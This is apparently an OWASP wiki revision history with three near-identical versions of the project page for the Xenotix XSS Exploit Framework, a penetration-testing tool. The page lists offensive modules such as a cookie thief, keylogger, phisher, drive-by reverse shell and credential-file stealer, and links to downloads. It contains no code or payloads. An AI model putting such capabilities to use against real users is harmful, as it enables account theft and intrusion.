2014-04-04T17:40:16Z

Ajin Abraham:

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Xenotix XSS Exploit Framework 5==

[[Image:XenotixV5.png|left|600px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:200px;" |

== QUICK DOWNLOAD ==

[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]

== NEWS AND EVENTS ==
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]
* [[OWASP_AntiSamy_Project]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*DOM Scanner
*Multiple Parameter Scanner
*POST Request Scanner
*Request Repeater
*URL Fuzzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
*Browser Fingerprinting
*Browser Features Detector
*Get Network IP
*Ping Scan
*Port Scan
*Internal Network Scan

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Phisher
*Tabnabbing
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*Gram WebCam Screenshot
*Executable Drive By
*JavaScript Shell
*Reverse HTTP WebShell
*Drive-By Reverse Shell
*Metasploit Browser Exploit
*Firefox Reverse Shell Addon (Persistent)
*Firefox Session Stealer Addon (Persistent)
*Firefox Keylogger Addon (Persistent)
*Firefox DDoSer Addon (Persistent)
*Firefox Linux Credential File Stealer Addon (Persistent)
*Firefox Download and Execute Addon (Persistent)

'''UTILITY MODULES'''
*WebKit Developer Tools
*Payload Encoder
*JavaScript Beautify
*Hash Calculator
*Hash Detector

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Nulcon Goa 2013'''
{{#ev:youtube|J1phYXmLX8w}}

'''ClubHack 2013'''
{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png||530px|thumb|Xenotix POST Request Scanner ]]
|
[[Image:XENOTIX INFO.png||530px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|530px|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|530px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]

Requirements
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 5 Videos'''
OWASP Xenotix XSS Exploit Framework v5{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''
OWASP Xenotix XSS Exploit Framework v4.5{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''
OWASP Xenotix XSS Exploit Framework v4{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''
OWASP Xenotix XSS Exploit Framework v3: XSS Scanner Module{{#ev:youtube|CJEgO4_kd-8}}
OWASP Xenotix XSS Exploit Framework v3: XSS Keylogger{{#ev:youtube|owfF9C_Xerw}}
OWASP Xenotix XSS Exploit Framework v3: XSS Executable Drive-By{{#ev:youtube|i8c3kf4t6A8}}
OWASP Xenotix XSS Exploit Framework v3: XSS Reverse Shell{{#ev:youtube|IT-8IH3yRrA}}
OWASP Xenotix XSS Exploit Framework v3: XSS DDoSer{{#ev:youtube|cgLGgVWvi9Y}}

'''Version 2 Videos'''
OWASP Xenotix XSS Exploit Framework Version 2 {{#ev:youtube|ei1ny7L8-8k}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

=Project About=
<div style="font-size:120%;border:none;margin: 0;color:#000">

{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}
__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-02-12T22:00:18Z

Ajin Abraham:

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Xenotix XSS Exploit Framework 5==

[[Image:XenotixV5.png|left|600px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:200px;" |

== QUICK DOWNLOAD ==

[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]

== NEWS AND EVENTS ==
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]
* [[OWASP_AntiSamy_Project]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*DOM Scanner
*Multiple Parameter Scanner
*POST Request Scanner
*Request Repeater
*URL Fuzzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
*Browser Fingerprinting
*Browser Features Detector
*Get Network IP
*Ping Scan
*Port Scan
*Internal Network Scan

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Phisher
*Tabnabbing
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*Gram WebCam Screenshot
*Executable Drive By
*JavaScript Shell
*Reverse HTTP WebShell
*Drive-By Reverse Shell
*Metasploit Browser Exploit
*Firefox Reverse Shell Addon (Persistent)
*Firefox Session Stealer Addon (Persistent)
*Firefox Keylogger Addon (Persistent)
*Firefox DDoSer Addon (Persistent)
*Firefox Linux Credential File Stealer Addon (Persistent)
*Firefox Download and Execute Addon (Persistent)

'''UTILITY MODULES'''
*WebKit Developer Tools
*Payload Encoder
*JavaScript Beautify
*Hash Calculator
*Hash Detector

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Nulcon Goa 2013'''
{{#ev:youtube|J1phYXmLX8w}}

'''ClubHack 2013'''
{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png||530px|thumb|Xenotix POST Request Scanner ]]
|
[[Image:XENOTIX INFO.png||530px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|530px|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|530px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]

Requirements
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 4.5 Videos'''
OWASP Xenotix XSS Exploit Framework v4.5{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''
OWASP Xenotix XSS Exploit Framework v4{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''
OWASP Xenotix XSS Exploit Framework v3: XSS Scanner Module{{#ev:youtube|CJEgO4_kd-8}}
OWASP Xenotix XSS Exploit Framework v3: XSS Keylogger{{#ev:youtube|owfF9C_Xerw}}
OWASP Xenotix XSS Exploit Framework v3: XSS Executable Drive-By{{#ev:youtube|i8c3kf4t6A8}}
OWASP Xenotix XSS Exploit Framework v3: XSS Reverse Shell{{#ev:youtube|IT-8IH3yRrA}}
OWASP Xenotix XSS Exploit Framework v3: XSS DDoSer{{#ev:youtube|cgLGgVWvi9Y}}

'''Version 2 Videos'''
OWASP Xenotix XSS Exploit Framework Version 2 {{#ev:youtube|ei1ny7L8-8k}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

=Project About=
<div style="font-size:120%;border:none;margin: 0;color:#000">

{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}
__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-02-12T21:58:51Z

Ajin Abraham: Version 5 Changes

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |

==OWASP Xenotix XSS Exploit Framework 5==

[[Image:XenotixV5.png|left|600px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:200px;" |

== QUICK DOWNLOAD ==

[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]

== NEWS AND EVENTS ==
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]
* [[OWASP_AntiSamy_Project]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*DOM Scanner
*Multiple Parameter Scanner
*POST Request Scanner
*Request Repeater
*URL Fuzzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
*Browser Fingerprinting
*Browser Features Detector
*Get Network IP
*Ping Scan
*Port Scan
*Internal Network Scan

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Phisher
*Tabnabbing
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*Gram WebCam Screenshot
*Executable Drive By
*JavaScript Shell
*Reverse HTTP WebShell
*Drive-By Reverse Shell
*Metasploit Browser Exploit
*Firefox Reverse Shell Addon (Persistent)
*Firefox Session Stealer Addon (Persistent)
*Firefox Keylogger Addon (Persistent)
*Firefox DDoSer Addon (Persistent)
*Firefox Linux Credential File Stealer Addon (Persistent)
*Firefox Download and Execute Addon (Persistent)

'''UTILITY MODULES'''
*WebKit Developer Tools
*Payload Encoder
*JavaScript Beautify
*Hash Calculator
*Hash Detector

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Nulcon Goa 2013'''
{{#ev:youtube|J1phYXmLX8w}}

'''ClubHack 2013'''
{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png||530px|thumb|Xenotix POST Request Scanner ]]
|
[[Image:XENOTIX INFO.png||530px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|530px|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|530px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]

Requirements
Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 4.5 Videos'''
OWASP Xenotix XSS Exploit Framework v4.5{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''
OWASP Xenotix XSS Exploit Framework v4{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''
OWASP Xenotix XSS Exploit Framework v3: XSS Scanner Module{{#ev:youtube|CJEgO4_kd-8}}
OWASP Xenotix XSS Exploit Framework v3: XSS Keylogger{{#ev:youtube|owfF9C_Xerw}}
OWASP Xenotix XSS Exploit Framework v3: XSS Executable Drive-By{{#ev:youtube|i8c3kf4t6A8}}
OWASP Xenotix XSS Exploit Framework v3: XSS Reverse Shell{{#ev:youtube|IT-8IH3yRrA}}
OWASP Xenotix XSS Exploit Framework v3: XSS DDoSer{{#ev:youtube|cgLGgVWvi9Y}}

'''Version 2 Videos'''
OWASP Xenotix XSS Exploit Framework Version 2 {{#ev:youtube|ei1ny7L8-8k}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

=Project About=
<div style="font-size:120%;border:none;margin: 0;color:#000">

{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}
